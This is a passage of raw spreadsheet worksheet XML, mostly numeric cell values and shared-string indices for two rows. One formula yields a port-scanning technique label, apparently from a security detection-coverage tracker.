        <v>0</v>
      </c>
      <c r="QC99" s="120">
        <v>0</v>
      </c>
      <c r="QD99" s="120">
        <v>0</v>
      </c>
      <c r="QE99" s="120"/>
      <c r="QF99" s="120">
        <v>0</v>
      </c>
      <c r="QG99" s="464">
        <v>0</v>
      </c>
      <c r="QH99" s="120">
        <v>0</v>
      </c>
      <c r="QI99" s="120">
        <v>0</v>
      </c>
      <c r="QJ99" s="120">
        <v>0</v>
      </c>
      <c r="QK99" s="120"/>
      <c r="QL99" s="120">
        <v>0</v>
      </c>
      <c r="QM99" s="464">
        <v>0</v>
      </c>
      <c r="QN99" s="120">
        <v>0</v>
      </c>
      <c r="QO99" s="120">
        <v>0</v>
      </c>
      <c r="QP99" s="120">
        <v>0</v>
      </c>
      <c r="QQ99" s="120"/>
      <c r="QR99" s="120">
        <v>0</v>
      </c>
      <c r="QS99" s="464">
        <v>0</v>
      </c>
      <c r="QT99" s="184"/>
      <c r="QU99" s="184"/>
      <c r="QV99" s="184"/>
      <c r="QW99" s="184"/>
      <c r="QX99" s="184"/>
      <c r="QY99" s="184"/>
      <c r="QZ99" s="184"/>
      <c r="RA99" s="184"/>
      <c r="RB99" s="184"/>
      <c r="RC99" s="184"/>
      <c r="RD99" s="184"/>
      <c r="RE99" s="184"/>
      <c r="RF99" s="184"/>
      <c r="RG99" s="184"/>
      <c r="RH99" s="184"/>
      <c r="RI99" s="184"/>
      <c r="RJ99" s="184"/>
      <c r="RK99" s="184"/>
      <c r="RL99" s="184"/>
      <c r="RM99" s="184"/>
      <c r="RN99" s="184"/>
      <c r="RO99" s="184"/>
      <c r="RP99" s="184"/>
      <c r="RQ99" s="184"/>
      <c r="RR99" s="184"/>
      <c r="RS99" s="184"/>
      <c r="RT99" s="184"/>
      <c r="RU99" s="184"/>
      <c r="RV99" s="184"/>
      <c r="RW99" s="184"/>
      <c r="RX99" s="184"/>
      <c r="RY99" s="184"/>
      <c r="RZ99" s="184"/>
      <c r="SA99" s="184"/>
      <c r="SB99" s="184"/>
      <c r="SC99" s="184"/>
      <c r="SD99" s="184"/>
      <c r="SE99" s="184"/>
      <c r="SF99" s="184"/>
      <c r="SG99" s="184"/>
      <c r="SH99" s="184"/>
      <c r="SI99" s="184"/>
      <c r="SJ99" s="184"/>
      <c r="SK99" s="184"/>
      <c r="SL99" s="184"/>
      <c r="SM99" s="184"/>
      <c r="SN99" s="184"/>
      <c r="SO99" s="184"/>
      <c r="SP99" s="184"/>
      <c r="SQ99" s="184"/>
      <c r="SR99" s="184"/>
      <c r="SS99" s="184"/>
      <c r="ST99" s="184"/>
      <c r="SU99" s="184"/>
      <c r="SV99" s="184"/>
      <c r="SW99" s="184"/>
      <c r="SX99" s="184"/>
      <c r="SY99" s="184"/>
      <c r="SZ99" s="184"/>
      <c r="TA99" s="184"/>
      <c r="TB99" s="184"/>
      <c r="TC99" s="184"/>
      <c r="TD99" s="184"/>
      <c r="TE99" s="184"/>
      <c r="TF99" s="184"/>
      <c r="TG99" s="184"/>
      <c r="TH99" s="184"/>
      <c r="TI99" s="184"/>
      <c r="TJ99" s="184"/>
      <c r="TK99" s="184"/>
      <c r="TL99" s="184"/>
      <c r="TM99" s="184"/>
      <c r="TN99" s="184"/>
      <c r="TO99" s="184"/>
      <c r="TP99" s="184"/>
      <c r="TQ99" s="184"/>
      <c r="TR99" s="184"/>
      <c r="TS99" s="184"/>
      <c r="TT99" s="184"/>
      <c r="TU99" s="184"/>
      <c r="TV99" s="184"/>
      <c r="TW99" s="184"/>
      <c r="TX99" s="184"/>
      <c r="TY99" s="184"/>
      <c r="TZ99" s="184"/>
      <c r="UA99" s="184"/>
      <c r="UB99" s="184"/>
      <c r="UC99" s="184"/>
      <c r="UD99" s="184"/>
      <c r="UE99" s="184"/>
      <c r="UF99" s="184"/>
      <c r="UG99" s="184"/>
      <c r="UH99" s="184"/>
      <c r="UI99" s="184"/>
      <c r="UJ99" s="184"/>
      <c r="UK99" s="184"/>
      <c r="UL99" s="184"/>
      <c r="UM99" s="184"/>
      <c r="UN99" s="184"/>
      <c r="UO99" s="184"/>
      <c r="UP99" s="184"/>
      <c r="UQ99" s="184"/>
      <c r="UR99" s="184"/>
      <c r="US99" s="184"/>
      <c r="UT99" s="184"/>
      <c r="UU99" s="184"/>
      <c r="UV99" s="184"/>
      <c r="UW99" s="184"/>
      <c r="UX99" s="184"/>
      <c r="UY99" s="184"/>
      <c r="UZ99" s="184"/>
      <c r="VA99" s="184"/>
      <c r="VB99" s="184"/>
      <c r="VC99" s="184"/>
      <c r="VD99" s="184"/>
      <c r="VE99" s="184"/>
      <c r="VF99" s="184"/>
      <c r="VG99" s="184"/>
      <c r="VH99" s="184"/>
      <c r="VI99" s="184"/>
      <c r="VJ99" s="184"/>
      <c r="VK99" s="184"/>
      <c r="VL99" s="184"/>
      <c r="VM99" s="184"/>
      <c r="VN99" s="184"/>
      <c r="VO99" s="184"/>
      <c r="VP99" s="184"/>
      <c r="VQ99" s="184"/>
      <c r="VR99" s="184"/>
      <c r="VS99" s="184"/>
      <c r="VT99" s="184"/>
      <c r="VU99" s="184"/>
      <c r="VV99" s="184"/>
      <c r="VW99" s="184"/>
      <c r="VX99" s="184"/>
      <c r="VY99" s="184"/>
    </row>
    <row r="100" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A100" s="82" t="s">
        <v>153</v>
      </c>
      <c r="B100" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C100" s="83" t="s">
        <v>557</v>
      </c>
      <c r="D100" s="83" t="s">
        <v>156</v>
      </c>
      <c r="E100" s="83">
        <f t="shared" si="5"/>
        <v>68</v>
      </c>
      <c r="F100" s="83" t="s">
        <v>157</v>
      </c>
      <c r="G100" s="83" t="s">
        <v>1621</v>
      </c>
      <c r="H100" s="83" t="s">
        <v>1622</v>
      </c>
      <c r="I100" s="81" t="s">
        <v>1623</v>
      </c>
      <c r="J100" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K100" s="81" t="s">
        <v>796</v>
      </c>
      <c r="L100" s="81" t="s">
        <v>1624</v>
      </c>
      <c r="M100" s="378" t="s">
        <v>259</v>
      </c>
      <c r="N100" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O100" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P100" s="91"/>
      <c r="Q100" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R100" s="92" t="s">
        <v>1625</v>
      </c>
      <c r="S100" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T100" s="92" t="s">
        <v>1626</v>
      </c>
      <c r="U100" s="94" t="s">
        <v>1627</v>
      </c>
      <c r="V100" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W100" s="96" t="s">
        <v>1628</v>
      </c>
      <c r="X100" s="97" t="s">
        <v>1629</v>
      </c>
      <c r="Y100" s="83" t="s">
        <v>1630</v>
      </c>
      <c r="Z100" s="98" t="s">
        <v>1631</v>
      </c>
      <c r="AA100" s="205" t="s">
        <v>745</v>
      </c>
      <c r="AB100" s="206" t="s">
        <v>745</v>
      </c>
      <c r="AC100" s="386" t="s">
        <v>745</v>
      </c>
      <c r="AD100" s="197"/>
      <c r="AE100" s="197"/>
      <c r="AF100" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG100" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH100" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI100" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ100" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK100" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL100" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM100" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN100" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO100" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP100" s="385" t="str">
        <f>M100&amp;"-frag"</f>
        <v>T1595.002-Port_Scanning-frag</v>
      </c>
      <c r="AQ100" s="651">
        <v>2058</v>
      </c>
      <c r="AR100" s="303"/>
      <c r="AS100" s="647">
        <v>2049</v>
      </c>
      <c r="AT100" s="647">
        <v>0</v>
      </c>
      <c r="AU100" s="647">
        <v>2049</v>
      </c>
      <c r="AV100" s="652" t="s">
        <v>4</v>
      </c>
      <c r="AW100" s="647">
        <v>2060</v>
      </c>
      <c r="AX100" s="647">
        <v>2060</v>
      </c>
      <c r="AY100" s="647">
        <v>0</v>
      </c>
      <c r="AZ100" s="647">
        <v>2060</v>
      </c>
      <c r="BA100" s="381" t="s">
        <v>4909</v>
      </c>
      <c r="BB100" s="101">
        <v>41</v>
      </c>
      <c r="BC100" s="102" t="s">
        <v>3900</v>
      </c>
      <c r="BD100" s="102">
        <v>41</v>
      </c>
      <c r="BE100" s="103" t="s">
        <v>3901</v>
      </c>
      <c r="BF100" s="103">
        <v>6</v>
      </c>
      <c r="BG100" s="104">
        <v>31</v>
      </c>
      <c r="BH100" s="105">
        <v>36</v>
      </c>
      <c r="BI100" s="106" t="s">
        <v>3902</v>
      </c>
      <c r="BJ100" s="497">
        <v>35</v>
      </c>
      <c r="BK100" s="107" t="s">
        <v>3903</v>
      </c>
      <c r="BL100" s="107">
        <v>13</v>
      </c>
      <c r="BM100" s="108">
        <v>25</v>
      </c>
      <c r="BN100" s="109">
        <v>77</v>
      </c>
      <c r="BO100" s="110" t="s">
        <v>2061</v>
      </c>
      <c r="BP100" s="501">
        <v>76</v>
      </c>
      <c r="BQ100" s="111" t="s">
        <v>2062</v>
      </c>
      <c r="BR100" s="111">
        <v>19</v>
      </c>
      <c r="BS100" s="112">
        <v>51</v>
      </c>
      <c r="BT100" s="113">
        <v>66</v>
      </c>
      <c r="BU100" s="114" t="s">
        <v>3904</v>
      </c>
      <c r="BV100" s="503">
        <v>66</v>
      </c>
      <c r="BW100" s="115" t="s">
        <v>3905</v>
      </c>
      <c r="BX100" s="115">
        <v>14</v>
      </c>
      <c r="BY100" s="116">
        <v>49</v>
      </c>
      <c r="BZ100" s="250">
        <v>59</v>
      </c>
      <c r="CA100" s="251" t="s">
        <v>3906</v>
      </c>
      <c r="CB100" s="505">
        <v>51</v>
      </c>
      <c r="CC100" s="252" t="s">
        <v>3907</v>
      </c>
      <c r="CD100" s="252">
        <v>21</v>
      </c>
      <c r="CE100" s="253">
        <v>36</v>
      </c>
      <c r="CF100" s="101">
        <v>125</v>
      </c>
      <c r="CG100" s="102" t="s">
        <v>3908</v>
      </c>
      <c r="CH100" s="102">
        <v>117</v>
      </c>
      <c r="CI100" s="103" t="s">
        <v>3909</v>
      </c>
      <c r="CJ100" s="103">
        <v>35</v>
      </c>
      <c r="CK100" s="104">
        <v>63</v>
      </c>
      <c r="CL100" s="105">
        <v>0</v>
      </c>
      <c r="CM100" s="106">
        <v>0</v>
      </c>
      <c r="CN100" s="497">
        <v>0</v>
      </c>
      <c r="CO100" s="107">
        <v>0</v>
      </c>
      <c r="CP100" s="107">
        <v>0</v>
      </c>
      <c r="CQ100" s="108">
        <v>0</v>
      </c>
      <c r="CR100" s="109">
        <v>4</v>
      </c>
      <c r="CS100" s="110" t="s">
        <v>1966</v>
      </c>
      <c r="CT100" s="501">
        <v>4</v>
      </c>
      <c r="CU100" s="111" t="s">
        <v>1927</v>
      </c>
      <c r="CV100" s="111">
        <v>2</v>
      </c>
      <c r="CW100" s="112">
        <v>4</v>
      </c>
      <c r="CX100" s="113">
        <v>81</v>
      </c>
      <c r="CY100" s="114" t="s">
        <v>2197</v>
      </c>
      <c r="CZ100" s="503">
        <v>80</v>
      </c>
      <c r="DA100" s="115" t="s">
        <v>2198</v>
      </c>
      <c r="DB100" s="115">
        <v>21</v>
      </c>
      <c r="DC100" s="116">
        <v>55</v>
      </c>
      <c r="DD100" s="101">
        <v>0</v>
      </c>
      <c r="DE100" s="102">
        <v>0</v>
      </c>
      <c r="DF100" s="102">
        <v>0</v>
      </c>
      <c r="DG100" s="103">
        <v>0</v>
      </c>
      <c r="DH100" s="103">
        <v>0</v>
      </c>
      <c r="DI100" s="104">
        <v>0</v>
      </c>
      <c r="DJ100" s="105">
        <v>22</v>
      </c>
      <c r="DK100" s="106" t="s">
        <v>3910</v>
      </c>
      <c r="DL100" s="497">
        <v>22</v>
      </c>
      <c r="DM100" s="107" t="s">
        <v>3911</v>
      </c>
      <c r="DN100" s="107">
        <v>4</v>
      </c>
      <c r="DO100" s="108">
        <v>12</v>
      </c>
      <c r="DP100" s="109">
        <v>22</v>
      </c>
      <c r="DQ100" s="110" t="s">
        <v>3910</v>
      </c>
      <c r="DR100" s="501">
        <v>22</v>
      </c>
      <c r="DS100" s="111" t="s">
        <v>3911</v>
      </c>
      <c r="DT100" s="111">
        <v>4</v>
      </c>
      <c r="DU100" s="112">
        <v>12</v>
      </c>
      <c r="DV100" s="113">
        <v>21</v>
      </c>
      <c r="DW100" s="114" t="s">
        <v>3912</v>
      </c>
      <c r="DX100" s="503">
        <v>21</v>
      </c>
      <c r="DY100" s="115" t="s">
        <v>3913</v>
      </c>
      <c r="DZ100" s="115">
        <v>6</v>
      </c>
      <c r="EA100" s="116">
        <v>15</v>
      </c>
      <c r="EB100" s="250">
        <v>25</v>
      </c>
      <c r="EC100" s="251" t="s">
        <v>3914</v>
      </c>
      <c r="ED100" s="505">
        <v>24</v>
      </c>
      <c r="EE100" s="252" t="s">
        <v>3915</v>
      </c>
      <c r="EF100" s="252">
        <v>6</v>
      </c>
      <c r="EG100" s="253">
        <v>14</v>
      </c>
      <c r="EH100" s="101">
        <v>46</v>
      </c>
      <c r="EI100" s="102" t="s">
        <v>3916</v>
      </c>
      <c r="EJ100" s="102">
        <v>45</v>
      </c>
      <c r="EK100" s="103" t="s">
        <v>3917</v>
      </c>
      <c r="EL100" s="103">
        <v>12</v>
      </c>
      <c r="EM100" s="104">
        <v>18</v>
      </c>
      <c r="EN100" s="105">
        <v>0</v>
      </c>
      <c r="EO100" s="106">
        <v>0</v>
      </c>
      <c r="EP100" s="497">
        <v>0</v>
      </c>
      <c r="EQ100" s="107">
        <v>0</v>
      </c>
      <c r="ER100" s="107">
        <v>0</v>
      </c>
      <c r="ES100" s="108">
        <v>0</v>
      </c>
      <c r="ET100" s="109">
        <v>0</v>
      </c>
      <c r="EU100" s="110">
        <v>0</v>
      </c>
      <c r="EV100" s="501">
        <v>0</v>
      </c>
      <c r="EW100" s="111">
        <v>0</v>
      </c>
      <c r="EX100" s="111">
        <v>0</v>
      </c>
      <c r="EY100" s="112">
        <v>0</v>
      </c>
      <c r="EZ100" s="113">
        <v>22</v>
      </c>
      <c r="FA100" s="114" t="s">
        <v>3910</v>
      </c>
      <c r="FB100" s="503">
        <v>22</v>
      </c>
      <c r="FC100" s="115" t="s">
        <v>3911</v>
      </c>
      <c r="FD100" s="115">
        <v>4</v>
      </c>
      <c r="FE100" s="116">
        <v>12</v>
      </c>
      <c r="FF100" s="101">
        <v>4</v>
      </c>
      <c r="FG100" s="102" t="s">
        <v>3918</v>
      </c>
      <c r="FH100" s="102">
        <v>4</v>
      </c>
      <c r="FI100" s="103" t="s">
        <v>454</v>
      </c>
      <c r="FJ100" s="103">
        <v>1</v>
      </c>
      <c r="FK100" s="104">
        <v>4</v>
      </c>
      <c r="FL100" s="105">
        <v>14</v>
      </c>
      <c r="FM100" s="106" t="s">
        <v>3919</v>
      </c>
      <c r="FN100" s="497">
        <v>13</v>
      </c>
      <c r="FO100" s="107" t="s">
        <v>3920</v>
      </c>
      <c r="FP100" s="107">
        <v>9</v>
      </c>
      <c r="FQ100" s="108">
        <v>13</v>
      </c>
      <c r="FR100" s="109">
        <v>18</v>
      </c>
      <c r="FS100" s="110" t="s">
        <v>3921</v>
      </c>
      <c r="FT100" s="501">
        <v>17</v>
      </c>
      <c r="FU100" s="111" t="s">
        <v>3922</v>
      </c>
      <c r="FV100" s="111">
        <v>10</v>
      </c>
      <c r="FW100" s="112">
        <v>16</v>
      </c>
      <c r="FX100" s="113">
        <v>8</v>
      </c>
      <c r="FY100" s="114" t="s">
        <v>3923</v>
      </c>
      <c r="FZ100" s="503">
        <v>8</v>
      </c>
      <c r="GA100" s="115" t="s">
        <v>3924</v>
      </c>
      <c r="GB100" s="115">
        <v>3</v>
      </c>
      <c r="GC100" s="116">
        <v>8</v>
      </c>
      <c r="GD100" s="250">
        <v>32</v>
      </c>
      <c r="GE100" s="251" t="s">
        <v>3925</v>
      </c>
      <c r="GF100" s="505">
        <v>25</v>
      </c>
      <c r="GG100" s="252" t="s">
        <v>3926</v>
      </c>
      <c r="GH100" s="252">
        <v>14</v>
      </c>
      <c r="GI100" s="253">
        <v>21</v>
      </c>
      <c r="GJ100" s="101">
        <v>40</v>
      </c>
      <c r="GK100" s="102" t="s">
        <v>3927</v>
      </c>
      <c r="GL100" s="102">
        <v>33</v>
      </c>
      <c r="GM100" s="103" t="s">
        <v>3928</v>
      </c>
      <c r="GN100" s="103">
        <v>17</v>
      </c>
      <c r="GO100" s="104">
        <v>23</v>
      </c>
      <c r="GP100" s="105">
        <v>0</v>
      </c>
      <c r="GQ100" s="106">
        <v>0</v>
      </c>
      <c r="GR100" s="497">
        <v>0</v>
      </c>
      <c r="GS100" s="107">
        <v>0</v>
      </c>
      <c r="GT100" s="107">
        <v>0</v>
      </c>
      <c r="GU100" s="108">
        <v>0</v>
      </c>
      <c r="GV100" s="109">
        <v>4</v>
      </c>
      <c r="GW100" s="110" t="s">
        <v>1966</v>
      </c>
      <c r="GX100" s="501">
        <v>4</v>
      </c>
      <c r="GY100" s="111" t="s">
        <v>1927</v>
      </c>
      <c r="GZ100" s="111">
        <v>2</v>
      </c>
      <c r="HA100" s="112">
        <v>4</v>
      </c>
      <c r="HB100" s="113">
        <v>22</v>
      </c>
      <c r="HC100" s="114" t="s">
        <v>3929</v>
      </c>
      <c r="HD100" s="503">
        <v>21</v>
      </c>
      <c r="HE100" s="115" t="s">
        <v>3930</v>
      </c>
      <c r="HF100" s="115">
        <v>12</v>
      </c>
      <c r="HG100" s="116">
        <v>20</v>
      </c>
      <c r="HH100" s="101">
        <v>37</v>
      </c>
      <c r="HI100" s="102" t="s">
        <v>3931</v>
      </c>
      <c r="HJ100" s="102">
        <v>37</v>
      </c>
      <c r="HK100" s="103" t="s">
        <v>3932</v>
      </c>
      <c r="HL100" s="103">
        <v>5</v>
      </c>
      <c r="HM100" s="104">
        <v>31</v>
      </c>
      <c r="HN100" s="105">
        <v>0</v>
      </c>
      <c r="HO100" s="106">
        <v>0</v>
      </c>
      <c r="HP100" s="497">
        <v>0</v>
      </c>
      <c r="HQ100" s="107">
        <v>0</v>
      </c>
      <c r="HR100" s="107">
        <v>0</v>
      </c>
      <c r="HS100" s="108">
        <v>0</v>
      </c>
      <c r="HT100" s="109">
        <v>37</v>
      </c>
      <c r="HU100" s="110" t="s">
        <v>3931</v>
      </c>
      <c r="HV100" s="501">
        <v>37</v>
      </c>
      <c r="HW100" s="111" t="s">
        <v>3932</v>
      </c>
      <c r="HX100" s="111">
        <v>5</v>
      </c>
      <c r="HY100" s="112">
        <v>31</v>
      </c>
      <c r="HZ100" s="113">
        <v>37</v>
      </c>
      <c r="IA100" s="114" t="s">
        <v>3931</v>
      </c>
      <c r="IB100" s="503">
        <v>37</v>
      </c>
      <c r="IC100" s="115" t="s">
        <v>3932</v>
      </c>
      <c r="ID100" s="115">
        <v>5</v>
      </c>
      <c r="IE100" s="116">
        <v>31</v>
      </c>
      <c r="IF100" s="250">
        <v>2</v>
      </c>
      <c r="IG100" s="251" t="s">
        <v>3933</v>
      </c>
      <c r="IH100" s="505">
        <v>2</v>
      </c>
      <c r="II100" s="252" t="s">
        <v>3934</v>
      </c>
      <c r="IJ100" s="252">
        <v>1</v>
      </c>
      <c r="IK100" s="253">
        <v>2</v>
      </c>
      <c r="IL100" s="101">
        <v>39</v>
      </c>
      <c r="IM100" s="102" t="s">
        <v>3935</v>
      </c>
      <c r="IN100" s="102">
        <v>39</v>
      </c>
      <c r="IO100" s="103" t="s">
        <v>3936</v>
      </c>
      <c r="IP100" s="103">
        <v>6</v>
      </c>
      <c r="IQ100" s="104">
        <v>33</v>
      </c>
      <c r="IR100" s="105">
        <v>0</v>
      </c>
      <c r="IS100" s="106">
        <v>0</v>
      </c>
      <c r="IT100" s="497">
        <v>0</v>
      </c>
      <c r="IU100" s="107">
        <v>0</v>
      </c>
      <c r="IV100" s="107">
        <v>0</v>
      </c>
      <c r="IW100" s="108">
        <v>0</v>
      </c>
      <c r="IX100" s="109">
        <v>0</v>
      </c>
      <c r="IY100" s="110">
        <v>0</v>
      </c>
      <c r="IZ100" s="501">
        <v>0</v>
      </c>
      <c r="JA100" s="111">
        <v>0</v>
      </c>
      <c r="JB100" s="111">
        <v>0</v>
      </c>
      <c r="JC100" s="112">
        <v>0</v>
      </c>
      <c r="JD100" s="113">
        <v>37</v>
      </c>
      <c r="JE100" s="114" t="s">
        <v>3931</v>
      </c>
      <c r="JF100" s="503">
        <v>37</v>
      </c>
      <c r="JG100" s="115" t="s">
        <v>3932</v>
      </c>
      <c r="JH100" s="115">
        <v>5</v>
      </c>
      <c r="JI100" s="116">
        <v>31</v>
      </c>
      <c r="JJ100" s="101">
        <v>0</v>
      </c>
      <c r="JK100" s="102">
        <v>0</v>
      </c>
      <c r="JL100" s="102">
        <v>0</v>
      </c>
      <c r="JM100" s="103">
        <v>0</v>
      </c>
      <c r="JN100" s="103">
        <v>0</v>
      </c>
      <c r="JO100" s="104">
        <v>0</v>
      </c>
      <c r="JP100" s="105">
        <v>0</v>
      </c>
      <c r="JQ100" s="106">
        <v>0</v>
      </c>
      <c r="JR100" s="497">
        <v>0</v>
      </c>
      <c r="JS100" s="107">
        <v>0</v>
      </c>
      <c r="JT100" s="107">
        <v>0</v>
      </c>
      <c r="JU100" s="108">
        <v>0</v>
      </c>
      <c r="JV100" s="109">
        <v>0</v>
      </c>
      <c r="JW100" s="110">
        <v>0</v>
      </c>
      <c r="JX100" s="501">
        <v>0</v>
      </c>
      <c r="JY100" s="111">
        <v>0</v>
      </c>
      <c r="JZ100" s="111">
        <v>0</v>
      </c>
      <c r="KA100" s="112">
        <v>0</v>
      </c>
      <c r="KB100" s="113">
        <v>0</v>
      </c>
      <c r="KC100" s="114">
        <v>0</v>
      </c>
      <c r="KD100" s="503">
        <v>0</v>
      </c>
      <c r="KE100" s="115">
        <v>0</v>
      </c>
      <c r="KF100" s="115">
        <v>0</v>
      </c>
      <c r="KG100" s="116">
        <v>0</v>
      </c>
      <c r="KH100" s="250">
        <v>0</v>
      </c>
      <c r="KI100" s="251">
        <v>0</v>
      </c>
      <c r="KJ100" s="505">
        <v>0</v>
      </c>
      <c r="KK100" s="252">
        <v>0</v>
      </c>
      <c r="KL100" s="252">
        <v>0</v>
      </c>
      <c r="KM100" s="253">
        <v>0</v>
      </c>
      <c r="KN100" s="101">
        <v>0</v>
      </c>
      <c r="KO100" s="102">
        <v>0</v>
      </c>
      <c r="KP100" s="102">
        <v>0</v>
      </c>
      <c r="KQ100" s="103">
        <v>0</v>
      </c>
      <c r="KR100" s="103">
        <v>0</v>
      </c>
      <c r="KS100" s="104">
        <v>0</v>
      </c>
      <c r="KT100" s="105">
        <v>0</v>
      </c>
      <c r="KU100" s="106">
        <v>0</v>
      </c>
      <c r="KV100" s="497">
        <v>0</v>
      </c>
      <c r="KW100" s="107">
        <v>0</v>
      </c>
      <c r="KX100" s="107">
        <v>0</v>
      </c>
      <c r="KY100" s="108">
        <v>0</v>
      </c>
      <c r="KZ100" s="109">
        <v>0</v>
      </c>
      <c r="LA100" s="110">
        <v>0</v>
      </c>
      <c r="LB100" s="501">
        <v>0</v>
      </c>
      <c r="LC100" s="111">
        <v>0</v>
      </c>
      <c r="LD100" s="111">
        <v>0</v>
      </c>
      <c r="LE100" s="112">
        <v>0</v>
      </c>
      <c r="LF100" s="113">
        <v>0</v>
      </c>
      <c r="LG100" s="114">
        <v>0</v>
      </c>
      <c r="LH100" s="503">
        <v>0</v>
      </c>
      <c r="LI100" s="115">
        <v>0</v>
      </c>
      <c r="LJ100" s="115">
        <v>0</v>
      </c>
      <c r="LK100" s="116">
        <v>0</v>
      </c>
      <c r="LL100" s="117">
        <v>60</v>
      </c>
      <c r="LM100" s="507">
        <v>52</v>
      </c>
      <c r="LN100" s="119">
        <v>3</v>
      </c>
      <c r="LO100" s="119">
        <v>11</v>
      </c>
      <c r="LP100" s="119">
        <v>36</v>
      </c>
      <c r="LQ100" s="119">
        <v>20</v>
      </c>
      <c r="LR100" s="119">
        <v>30</v>
      </c>
      <c r="LS100" s="119">
        <v>36</v>
      </c>
      <c r="LT100" s="382"/>
      <c r="LU100" s="117">
        <v>0</v>
      </c>
      <c r="LV100" s="118">
        <v>0</v>
      </c>
      <c r="LW100" s="507">
        <v>0</v>
      </c>
      <c r="LX100" s="119">
        <v>0</v>
      </c>
      <c r="LY100" s="119">
        <v>0</v>
      </c>
      <c r="LZ100" s="119">
        <v>0</v>
      </c>
      <c r="MA100" s="117">
        <v>24</v>
      </c>
      <c r="MB100" s="118" t="s">
        <v>4279</v>
      </c>
      <c r="MC100" s="507">
        <v>20</v>
      </c>
      <c r="MD100" s="119" t="s">
        <v>4280</v>
      </c>
      <c r="ME100" s="119">
        <v>3</v>
      </c>
      <c r="MF100" s="119">
        <v>20</v>
      </c>
      <c r="MG100" s="117">
        <v>0</v>
      </c>
      <c r="MH100" s="118">
        <v>0</v>
      </c>
      <c r="MI100" s="507">
        <v>0</v>
      </c>
      <c r="MJ100" s="119">
        <v>0</v>
      </c>
      <c r="MK100" s="119">
        <v>0</v>
      </c>
      <c r="ML100" s="119">
        <v>0</v>
      </c>
      <c r="MM100" s="117">
        <v>0</v>
      </c>
      <c r="MN100" s="118">
        <v>0</v>
      </c>
      <c r="MO100" s="507">
        <v>0</v>
      </c>
      <c r="MP100" s="119">
        <v>0</v>
      </c>
      <c r="MQ100" s="119">
        <v>0</v>
      </c>
      <c r="MR100" s="119">
        <v>0</v>
      </c>
      <c r="MS100" s="117">
        <v>0</v>
      </c>
      <c r="MT100" s="118">
        <v>0</v>
      </c>
      <c r="MU100" s="507">
        <v>0</v>
      </c>
      <c r="MV100" s="119">
        <v>0</v>
      </c>
      <c r="MW100" s="119">
        <v>0</v>
      </c>
      <c r="MX100" s="119">
        <v>0</v>
      </c>
      <c r="MY100" s="117">
        <v>0</v>
      </c>
      <c r="MZ100" s="118">
        <v>0</v>
      </c>
      <c r="NA100" s="507">
        <v>0</v>
      </c>
      <c r="NB100" s="119">
        <v>0</v>
      </c>
      <c r="NC100" s="119">
        <v>0</v>
      </c>
      <c r="ND100" s="119">
        <v>0</v>
      </c>
      <c r="NE100" s="117">
        <v>0</v>
      </c>
      <c r="NF100" s="118">
        <v>0</v>
      </c>
      <c r="NG100" s="507">
        <v>0</v>
      </c>
      <c r="NH100" s="119">
        <v>0</v>
      </c>
      <c r="NI100" s="119">
        <v>0</v>
      </c>
      <c r="NJ100" s="119">
        <v>0</v>
      </c>
      <c r="NK100" s="117">
        <v>19</v>
      </c>
      <c r="NL100" s="118" t="s">
        <v>4421</v>
      </c>
      <c r="NM100" s="507">
        <v>19</v>
      </c>
      <c r="NN100" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO100" s="119">
        <v>1</v>
      </c>
      <c r="NP100" s="119">
        <v>19</v>
      </c>
      <c r="NQ100" s="117">
        <v>1</v>
      </c>
      <c r="NR100" s="118" t="s">
        <v>4220</v>
      </c>
      <c r="NS100" s="507">
        <v>1</v>
      </c>
      <c r="NT100" s="119" t="s">
        <v>3226</v>
      </c>
      <c r="NU100" s="119">
        <v>1</v>
      </c>
      <c r="NV100" s="119">
        <v>1</v>
      </c>
      <c r="NW100" s="117">
        <v>16</v>
      </c>
      <c r="NX100" s="118" t="s">
        <v>4422</v>
      </c>
      <c r="NY100" s="507">
        <v>12</v>
      </c>
      <c r="NZ100" s="119" t="s">
        <v>4423</v>
      </c>
      <c r="OA100" s="119">
        <v>9</v>
      </c>
      <c r="OB100" s="119">
        <v>10</v>
      </c>
      <c r="OC100" s="120">
        <v>20</v>
      </c>
      <c r="OD100" s="120">
        <v>20</v>
      </c>
      <c r="OE100" s="120">
        <v>7</v>
      </c>
      <c r="OF100" s="121">
        <v>5</v>
      </c>
      <c r="OG100" s="120">
        <v>18</v>
      </c>
      <c r="OH100" s="120">
        <v>18</v>
      </c>
      <c r="OI100" s="120">
        <v>18</v>
      </c>
      <c r="OJ100" s="120">
        <v>18</v>
      </c>
      <c r="OK100" s="383"/>
      <c r="OL100" s="120">
        <v>16</v>
      </c>
      <c r="OM100" s="120">
        <v>16</v>
      </c>
      <c r="ON100" s="120">
        <v>16</v>
      </c>
      <c r="OO100" s="120" t="s">
        <v>3937</v>
      </c>
      <c r="OP100" s="120">
        <v>4</v>
      </c>
      <c r="OQ100" s="464">
        <v>16</v>
      </c>
      <c r="OR100" s="120">
        <v>2</v>
      </c>
      <c r="OS100" s="120">
        <v>2</v>
      </c>
      <c r="OT100" s="120">
        <v>2</v>
      </c>
      <c r="OU100" s="120" t="s">
        <v>3938</v>
      </c>
      <c r="OV100" s="120">
        <v>2</v>
      </c>
      <c r="OW100" s="464">
        <v>2</v>
      </c>
      <c r="OX100" s="120">
        <v>2</v>
      </c>
      <c r="OY100" s="120">
        <v>2</v>
      </c>
      <c r="OZ100" s="120">
        <v>2</v>
      </c>
      <c r="PA100" s="120" t="s">
        <v>3939</v>
      </c>
      <c r="PB100" s="120">
        <v>1</v>
      </c>
      <c r="PC100" s="464">
        <v>2</v>
      </c>
      <c r="PD100" s="120">
        <v>0</v>
      </c>
      <c r="PE100" s="120">
